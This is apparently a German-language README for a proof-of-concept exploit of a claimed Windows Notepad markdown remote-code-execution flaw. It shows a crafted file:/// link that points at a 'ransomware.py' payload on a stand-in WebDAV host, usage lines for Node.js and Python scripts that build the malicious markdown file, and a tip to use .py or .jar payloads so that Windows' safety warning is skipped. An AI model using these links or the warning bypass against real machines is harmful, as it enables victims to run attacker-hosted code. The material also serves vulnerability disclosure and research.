
PoC for the "Windows Notepad RCE"
PoC der „Windows Notepad RCE“-Schwachstelle.
Die „Schwachstelle“ ist einfach. Die Markdown-Engine in Windows Notepad kümmert sich nicht um obskure URL-Protokolle. Als Malware-Analyst habe ich viele Berichte über WebDAV- und SMB-basierte Payload-Bereitstellung gelesen. Aus diesem Dokument kann man das file:///-Protokoll missbrauchen und eine URL erstellen, die auf eine Datei auf einem WebDAV/SMB-Server verweist.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
Ich habe zwei Skripte erstellt. Eines in Node.js und das andere in Python. Beide erstellen eine Markdown-Datei, die auf einen WebDAV-Payload verweist. Sie können die Beispiel-Payloads im Ordner sample-payloads verwenden.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
Die Ausgabe (poc.md) erscheint im aktuellen Verzeichnis.
Die meisten Payload-Dateierweiterungen (z. B. .exe, .lnk, .vbs, ...) lösen trotz der Verwundbarkeit der Notepad-App eine integrierte Warnung aus. Die Warnung kommt von Windows selbst. Zumindest bei allem, was ich getestet habe und das zu Codeausführung auf einer standardmäßigen OOB-Installation führen kann, wird diese obligatorische Warnung angezeigt.

Wenn auf dem Zielgerät Python oder Java installiert ist, können Sie einen .py- oder .jar-Payload verwenden, um das Warn-Pop-up zu umgehen.

Durch Klicken auf den Link wird nun eine neue Pop-up-Warnung angezeigt.
Sie können die anfällige Version von Windows Notepad von Uptodown finden. Denken Sie daran, die digitale Signatur des Installers zu überprüfen und sicherzustellen, dass sie von Microsoft stammt. Außerdem sollten Sie diesen PoC nur in einer VM testen.
Bleiben Sie sicher und haben Sie Spaß!